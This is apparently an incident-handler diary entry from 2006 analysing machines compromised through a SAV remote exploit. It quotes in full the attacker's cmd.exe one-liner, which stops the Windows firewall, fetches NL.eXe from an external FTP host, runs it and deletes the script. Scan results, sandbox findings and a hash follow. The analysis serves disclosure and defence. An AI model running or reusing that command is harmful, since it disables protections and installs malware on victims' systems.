Last Updated: 2006-12-15 19:13:42 UTC
by donald smith (Version: 2)
This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:
Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 126.96.36.199 on tcp port 12345 188.8.131.52 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"
Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.
Running the file through Virustotal gave limited information.
Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 184.108.40.206 12.14.2006 Win32.Polipos.sus
Fortinet 220.127.116.11 12.14.2006 suspicious
Ikarus T18.104.22.168 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 22.214.171.124 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 126.96.36.199 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
All others reported no virus found!
File size: 12168 bytes
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 188.8.131.52.
We have requested the cc system and the malware distribution site be shutdown.
I submitted nl.exe to norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)
[ General information ]
* File length: 12168 bytes.
* MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
* Creates file C:\WINDOWS\TEMP\NL055.bat.
[ Process/window information ]
* Enumerates running processes.
* Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.
[ Signature Scanning ]
* C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
* C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.
(C) 2004-2006 Norman ASA. All Rights Reserved
We had one report that this virus included a keylogger that has yet to be verified.